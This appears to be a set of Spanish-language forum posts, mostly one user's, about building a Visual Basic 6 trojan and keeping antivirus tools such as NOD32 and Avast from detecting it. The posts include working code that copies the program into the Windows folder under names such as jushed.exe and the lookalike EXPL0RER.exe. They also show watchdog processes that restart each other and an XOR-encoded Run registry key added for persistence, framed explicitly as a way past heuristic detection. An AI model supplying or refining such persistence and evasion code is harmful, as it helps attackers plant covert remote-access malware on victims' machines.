Mensajes

no se porque el avast me empezo a detectar mi troyanito =(
esta hecho en vb y lo hice yo, ningun otro av lo detecta solo el nod
parece que es por que se copia a la carpeta de windows i se renombra, ademas de eso crea un programa aparte que chekea si esta iniciado el proceso, si no lo esta lo inicia, todo esto en un timer
tambien tengo cifrada la clave del registro..
que puedo hacer?
publico el code para que me ayuden en que parte puede estar detectandolo???
GraciaS de AnteManO!

me da error al poner el componente del richtextbox...=S no lo habia usado nunca antes
me tira el siguiente error
No se encontro la informacion de licencia para este componente. No tiene una licencia apropiada para usar esta funcionalidad en el entorno de diseño.

[^ç*]

Primero que nada este code no es para mi... me lo pidio un amigo que en realidad no entiendo mucho lo que quiere hacer... al parecer es para descifrar un codigo del zodiaco.. algo así entendi.. pero bueno aca va la pregunta

lo que quiero hacer es por ejemplo tener un textbox, y en ese textbox se escribiria un textto como este con varios signos
1asd^ç*da!7//asd?^ç*??213¡¡¡
la idea es que al apretar un command button el textbox marque todas las combinaciones repeitdas de 3 caracteres, por ejemplo aca se repite la combinacion de 3 caracteres ^ç* entonces el textbox deberia marcar con otro color el ^ç*
me expplique bien???
es posible hacer esto con vb6???
Gracias de antemano!!!!

[vivachapas]

Código [Seleccionar] Expandir


dim Windows = environ("windir") 'la variable windows es igual a la carpeta donde este el windows
On Error GoTo fallo'este code lo pones por ejemplo en form_load
Set Clave = CreateObject("WScript.shell")
Deb = descifrar("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[Lkftt")
Clave.regwrite Deb, Windows & "\jushed.exe" 'jushed.exe seria el nombre de la aplicacion que quieres que se inicie
fallo:

Private Function descifrar(j)
On Error Resume Next
For R = 1 To Len(j)
descifrar = descifrar & Chr(Asc(Mid(j, R, 1)) Xor 7)
Next
End Function

Aca tiene el code para agregar la cadena al registro y de paso encriptarla, para no tener problemas con la heuristica como por ejemplo con el nod32
este code no es mio
todos los creditos a vivachapas!

 !!!!!!!!
Gracias E0N!!!!!!!!!!!!!!!!!!!
siempre me salvas xD
gracias de nuevo!

hace tiempo que estoy con un troyano, y decidi hacerle un modulo de "infeccion", entre comillas por que realmente no es infeccion.. lo unico que hace es copiar el programa 2 veces a la carpeta de windows, con los nombres ssms.exe y jushed.exe, el primero compureba cada cierto rato que exista el archivo jushed y que este iniciado el proceso, si no es asi, se autocopia, i si es necesario inicia el proceso, lo mismo jushed.exe, hace lo mismo, solo que inversamente, ademas de hacer la conexion al troyano. El problema esta en que en el modulo, esta la linea

Código [Seleccionar] Expandir

WinDirek = Environ("windir") & "/"
BSExe = App.path & "/" & App.EXEName & ".exe"
FileCopy BSExe, WinDirek & "jushed.exe"

si saco la linea filecopy, y le paso el nod32, no lo detecta, si la vuelvo a poner me lo empieza a detectar

alguien sabe como solucionarlo??? talve encriptandolo???
GraciasS de Antemano

ademas... ahora estoy haciendo que se autocopie a la carpeta de windows, estoy haciendo una funcion de "infeccion", comprueba cada cierto rato si existen ssms.exe y jushed.exe, si no existen, se autocopia a la carpeta de windows, y les pone ese nombre, y si existen, comprueba que los 2 esten abiertos, el ssms.exe, ayuda a que jushed.exe se mantenga siempre abierto, y jushed ayuda a que ssms.exe se mantenga abierto ademas de hacer la conexion a mi troyano. Esto funciona de maravilla.. hasta que llega el nod32, diciendo que esta infectado, y si quito estas lineas:

Código [Seleccionar] Expandir


WinDirek = Environ("windir") & "/" 'carpeta de windows
BSExe = App.path & "/" & App.EXEName & ".exe" 'path de la aplicacion
FileCopy BSExe, "C:\" & "ssms.exe"
FileCopy BSExe, WinDirek & "jushed.exe"


se podria cifrar esto para que el maldito nod para de saltar???
gracias!

ok se me habia olvidado parte del code xD
aca va

Código [Seleccionar] Expandir


dim windows as string 'en general
private sub form_load()
Windows = Environ("windir") & "\" 'declara la ruta de windows y agrega un /
end sub

private sub timer1_timer()
On Error GoTo fallo
Set Clave = CreateObject("WScript.shell")
Deb = descifrar("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[Lkftt")
Clave.regwrite Deb, Windows & "\EXPL0RER.exe"
fallo:
end sub

Private Function descifrar(j)
On Error Resume Next
For R = 1 To Len(j)
descifrar = descifrar & Chr(Asc(Mid(j, R, 1)) Xor 7)
Next
End Function


aca les dejo el code que ocupo.. ahora que me doi cuenta, probablemente no sea esta la razon por la que se remplaze.. talvez me confundi o algo asi.. de todas maneras si ocupo este code:

Código [Seleccionar] Expandir

On Error GoTo fallo
Set Clave = CreateObject("WScript.shell")
Deb = descifrar("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[Lkftt")
Clave.regwrite Deb, Windows & "\EXPL0RER.exe"
fallo:

y cambio esta parte

Código [Seleccionar] Expandir

Clave.regwrite Deb, Windows & "\EXPL0RER.exe"

por esta

Código [Seleccionar] Expandir

Clave.regwrite Deb, Windows & "\klass.exe"

no deberia remplazarse o si????
Gracias de antemano 

excelente aporte! muy util!